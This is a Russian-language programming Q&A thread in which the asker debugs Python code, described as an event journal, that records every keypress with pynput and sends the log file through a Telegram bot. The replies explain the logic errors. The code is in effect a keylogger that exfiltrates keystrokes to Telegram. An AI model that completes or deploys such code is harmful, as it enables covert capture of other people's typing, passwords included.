# Python - не отправляет нужные данные

Tags: python, python-3.x, telebot, логирование

Создаю журнал для записи всех событий и отправки удобным способом (*модуль logging*), для отправки данных выбрал Telegram-бота. Но проблема заключается в следующем. Данные отправляются только об успешном подключении, то есть в готовом файле хранятся не журнал, что писала программа. А любой файл содержит примерно такой текст:

```
2020-11-18 22:09:06,469:Starting new HTTPS connection (1): api.telegram.org
2020-11-18 22:09:07,140:"GET /bot токен
```

Сам код программы:

```
import logging.config
from pynput.keyboard import Key, Listener
import logging
import telebot
import os
import sys
import shutil

bot = telebot.TeleBot("токен")

keygen = "файл.txt"
os.getcwd()
os.chdir(r"путь\ ")
logger = logging.getLogger()
l = logging.StreamHandler()
logging.FileHandler(keygen)
l.setLevel(logging.DEBUG)
format = logging.Formatter("%(asctime)s:%(message)s")
l.setFormatter(format)
logger.addHandler(l)


@bot.message_handler(commands=["start"])
def start_message(message):
    logging.disable(level=logging.CRITICAL)
    shutil.copyfile(r"путь\файл.txt",
                    r"путь\файл1.txt")
    file = open("путь\файл1.txt", "rb")

    bot.send_document(message.chat.id, file)
    file.close()

    os.remove("путь\файл1.txt")

    bot.stop_polling()


bot.polling()


def keypress(Key):
    logging.info(str(Key))


with Listener(on_press=keypress) as listener:
    listener.join()
```

Сражаюсь с этим уже неделю, не понимаю где тут ошибка моя. Заранее очень благодарен за ответ.

Answer (score 0):

### Формулировка

Очень размытая формулировка, 4 раза прочитал - не понял до конца что вы хотите получить.

Ваш код можно логически разделить на 4 части:

- настройка логгирования в файл
- регистрация хэндлера c отправкой файла
- запуск бота
- код, который исполнится после остановки бота

### А теперь о том, что вы сделали

В первом этапе вы настроили логгер. Я не вчитывался, но будем считать, что корректно.

На втором этапе командой `logging.disable(level=logging.CRITICAL)` вы выключили логгирование...

Третий этап запустил бота

Четвёртый этап (после остановки бота), вероятно вы пытаетесь что-то вводить в консоль, но отображаться оно тоже не будет, т.к. на втором этапе логгер был выключен.

Comment: Данный код должен после остановки отправлять готовые данные, что записаны в файлы в бота. Но файлы отправляются не с тем текстом. То есть проще говоря вместо своего журнала и тех данных что мне нужны бот дает файл с успешным подключением к нему

Comment: Бот делает ровно так, как вы написали: вы пишите лог в файл `файл.txt`, затем делаете копию этого файла и отправляете пользователю. Там не может быть что-то другое :)